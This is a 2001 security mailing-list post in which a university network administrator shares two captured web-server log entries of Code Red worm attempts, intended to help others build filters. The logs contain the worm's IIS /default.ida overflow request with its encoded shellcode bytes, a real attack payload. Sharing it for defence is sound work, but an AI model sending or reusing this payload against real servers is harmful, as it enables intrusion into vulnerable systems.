Captured Code Red IIS Hack Attempts

Williams, Bob WilliamsRB at mail.vmi.edu
Wed Aug 1 16:33:19 GMT 2001


Folks,

FYI - Here are the log files of two attempted Code Red worm attacks picked
up this morning by one of our security servers.  One was from a host on the
ISP Shaw Fiberlink in Alberta, CA, the other from a host on the Korea Radio
Promotion Association network in Seoul.  Both attempts use the same code
sequence following the NNNNNNNNNs, so this information may be useful in
defining Code Red firewall, router etc. filters.  Time/date information is
EDT.

Bob Williams
UNIX/Network Security Administrator
Virginia Military Institute
Information Technology
427 Nichols Engineering Annex
Lexington, VA 24450

540-464-7758

______________________________________________________________
Log: 
Client connecting: 211.252.60.3
<---GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%
u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0
<---Content-type: text/xm
<---HOST:www.worm.co
<--- Accept: */
<---Content-length: 3569 
--->HTTP/1.1 404 Not Found
--->Date: Wed Aug 01 11:04:34 2001
--->Server: Apache/1.3.9 (Unix)
--->Connection: close
--->Content-Type: text/html
---><HTML><HEAD><TITLE>Error 404</TITLE></HEAD><BODY><P><H1>404: Document
Not Found</H1></P></BODY></HTML>
Closing connection with 211.252.60.3
_____________________________________________________________________
Log: 
Client connecting: 24.77.251.188
<---GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%
u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0
<---Content-type: text/xm
<---HOST:www.worm.co
<--- Accept: */
<---Content-length: 3569 
--->HTTP/1.1 404 Not Found
--->Date: Wed Aug 01 08:43:43 2001
--->Server: Apache/1.3.9 (Unix)
--->Connection: close
--->Content-Type: text/html
---><HTML><HEAD><TITLE>Error 404</TITLE></HEAD><BODY><P><H1>404: Document
Not Found</H1></P></BODY></HTML>
Closing connection with 24.77.251.188
_______________________________________________________






More information about the unisog mailing list